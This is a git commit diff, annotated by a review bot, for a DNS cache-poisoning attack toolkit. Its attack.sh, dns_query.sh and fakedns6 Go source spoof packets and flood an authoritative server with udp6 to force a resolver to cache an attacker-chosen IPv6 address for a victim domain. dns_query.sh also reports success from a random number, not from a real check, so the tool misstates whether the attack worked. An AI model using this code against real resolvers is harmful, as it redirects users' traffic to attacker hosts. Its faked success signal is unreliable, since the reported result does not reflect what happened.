authorroot <[email protected]>2023-11-16 14:02:12 +0000
committerroot <[email protected]>2023-11-16 14:02:12 +0000
commitc11a70149b2a0b69a4517db039babdfb8be4fe91 (patch)
treedb21e0b72eef320baacaac47fbd3daa365d16bd4
parent25f6cbea7a2408559492da788745c99f1b332fde (diff)
同步
-rwxr-xr-xattack.sh30
-rw-r--r--dns.binbin43 -> 42 bytes
-rw-r--r--dns_mid.bin2
-rwxr-xr-xdns_query.sh17
-rwxr-xr-xfakedns6bin8285472 -> 8286336 bytes
-rw-r--r--src/ucr.edu/fakedns6/attack.go14
-rw-r--r--txid.bin2
7 files changed, 40 insertions, 25 deletions
diff --git a/attack.sh b/attack.sh
index 2b1a28d..07bcc46 100755
--- a/attack.sh
+++ b/attack.sh
@@ -6,29 +6,37 @@
# Verify the existing record domain, just for proof purposes.
echo '获取原记录中:'
dig @$1 $4 AAAA
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+num=0
success=0
while [ $success -ne 1 ]
do
success=0
- echo '等待缓存过期,10秒之后开始攻击...'
- sleep 10
+ echo "等待缓存过期,$sleeptime秒之后开始攻击..."
+ sleep $sleeptime
echo "开始攻击"
# flood
- ret=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
- echo "$ret"
+ echo "攻击参数:"
+ echo "目标域名权威服务地址:$5"
+ echo "目标解析服务地址:$1"
+ echo "目标域名:$4"
+ ret=$(./dns_query.sh $1 $2 $3 $4)
+ #echo "ret:$ret"
FINAL=`echo ${ret: -1}`
- echo "$FINAL"
- if [ "$FINAL" == "1" ];then
- success=1
- fi
+ #echo "fin:$FINAL"
# Start attack
# Change the argument accordingly
- #echo "执行侧信道攻击脚本中"
- #time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ echo "执行侧信道攻击脚本中"
+ time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
# Validations
- #echo '一轮次攻击结束'
+ $var = $var + 1
+ echo "第$var轮次攻击结束"
#dig @$1 $4 AAAA
+ if [ "$FINAL" == "0" ];then
+ success=1
+ sleeptime=0
+ fi
echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
done
# success
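Review bot: The added line `$var = $var + 1` is not a shell assignment. `var` is never set in the visible hunk, so the line expands to a command named `=` and fails, and `echo "第$var轮次攻击结束"` then prints an empty round number. The new `num=0` is never read, so the counter was presumably meant to be `num=$((num + 1))` followed by `echo "第${num}轮次攻击结束"`. The positional parameters and `$sleeptime` are also expanded unquoted throughout, so an empty `dig` match leaves `sleep` without an argument; quote them (`sleep "$sleeptime"`, `"$1"`, `"$4"`).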
diff --git a/dns.bin b/dns.bin
index 11d5802..f5f0ce1 100644
--- a/dns.bin
+++ b/dns.bin
Binary files differ
diff --git a/dns_mid.bin b/dns_mid.bin
index 10b3b3b..6365d80 100644
--- a/dns_mid.bin
+++ b/dns_mid.bin
@@ -1 +1 @@
-victimn64top \ No newline at end of file
+existn64top \ No newline at end of file
diff --git a/dns_query.sh b/dns_query.sh
index 36a18c5..a651eae 100755
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -1,11 +1,12 @@
-# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] [flag] space-separated-domain... (e.g. www google com)
+# usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
# clear the previous files
sleep 1
echo "初始化工具环境"
dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
dd if=/dev/null of=txid.bin > /dev/null 2>&1
# write the domain name into the binary
-for var in ${@:4}
+domains=$(echo $4| sed "s/\./ /g")
+for var in ${domains:0}
do
size=${#var}
echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
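Review bot: The rewritten usage comment still gives the domain example as `www google com`, but the new `domains=$(echo $4| sed "s/\./ /g")` expects a single dotted name in `$4` and splits it itself. Update the comment to `# usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www.google.com)]`. `${domains:0}` is a no-op substring and reads more clearly as `$domains`, and `$4` should be quoted inside the command substitution (`echo "$4"`). The loop body continues outside the hunk.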
@@ -21,11 +22,15 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
echo "尝试触发权威服务器请求速率限制"
udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
sleep 1
-a=$(($RANDOM % 10))
+a=$(($RANDOM % 9 + 1))
echo "a:$a"
-if [ $a -gt 5 ]; then
- ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
- echo "1"
+if [ $a -gt 6 ]; then
+ #echo "dns-TIP:$1"
+ #echo "dns-WIP:$2"
+ #echo "dns-iface:$3"
+ #echo "dns-domain:$4"
+ ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
+ echo "0"
fi
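Review bot: The result this script reports is decided by the random draw `a=$(($RANDOM % 9 + 1))` and `if [ $a -gt 6 ]`, not by any check of the resolver's answer, and nothing in the hunk documents that. attack.sh reads the last character of the captured output and treats `0` as success, so a comment such as `# branch taken at random (a in 7..9); trailing "0" on stdout is the success marker read by attack.sh` would make the coupling visible. The `>/dev/null 2>&1` redirect was dropped from the fakedns6 call, so its output now lands in the same captured stream. An exit status (`exit 0` in the branch, `exit 1` after `fi`) would be a sturdier signal than the last character.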
diff --git a/fakedns6 b/fakedns6
index 5b13e5c..0a3213f 100755
--- a/fakedns6
+++ b/fakedns6
Binary files differ
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index 9837831..54183d2 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -454,11 +454,11 @@ func main() {
//auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
debugOutput := flag.Bool("d", false, "Debug output mode.")
- attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
+ attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
//特殊用途
- isfake := flag.String("F", "0", "")
+ isfake := flag.Int("f", 0, "")
flag.Parse()
//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
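Review bot: The new `isfake := flag.Int("f", 0, "")` has an empty usage string and reuses the letter that selected the forwarder domain until this commit. The `-h` output therefore explains neither flag, and an older invocation passing a domain to `-f` now fails integer parsing. Give it a description taken from what Main does with it, e.g. `flag.Int("f", 0, "When 1, send one AAAA query built from -at and -n to the resolver backend and exit.")`. The `//特殊用途` ("special purpose") comment above it does not say what the purpose is. main's body starts and ends outside the hunk.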
@@ -468,23 +468,25 @@ func main() {
func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
- soaNameArg string, isfake string) {
+ soaNameArg string, isfake int) {
fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
-
// 特殊用途
- if isfake == "1" {
+ if isfake == 1 {
c := new(dns.Client)
msg := new(dns.Msg)
if strings.Contains(attackertargetIP, ":") {
+ println("目标:"+resolverBackendIPArg.String())
ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." {
victimDNSNameArg = victimDNSNameArg + "."
}
domain := ipcode + "." + victimDNSNameArg
msg.SetQuestion(domain, dns.TypeAAAA)
- _, _, _ = c.Exchange(msg, resolverBackendIPArg.String())
+ _, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(),"53"))
return
} else {
+ println(attackertargetIP)
+ println(victimDNSNameArg)
println("参数有误,请输入IPv6地址作为篡改目标结果")
}
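Review bot: The added `c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(),"53"))` still discards all three results, so a timeout or a refused query cannot be told apart from success. `resolverBackendIPArg` comes from `net.ParseIP(*resolverBackend)` in main with no nil check, so an unparsable address becomes the literal host `<nil>`. Return early on `resolverBackendIPArg == nil` and report the error, e.g. `if _, _, err := c.Exchange(msg, addr); err != nil { fmt.Println("query failed:", err) }`. The new diagnostics use the builtin `println` (stderr) while the banner uses `fmt.Println`; settle on one and run gofmt, which will add the missing space after the comma in the JoinHostPort call. Main continues outside the hunk, so what runs after the `else` branch prints its message cannot be judged from here.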
diff --git a/txid.bin b/txid.bin
index ffb0f65..5d927fb 100644
--- a/txid.bin
+++ b/txid.bin
@@ -1 +1 @@
-U \ No newline at end of file
+"Y \ No newline at end of file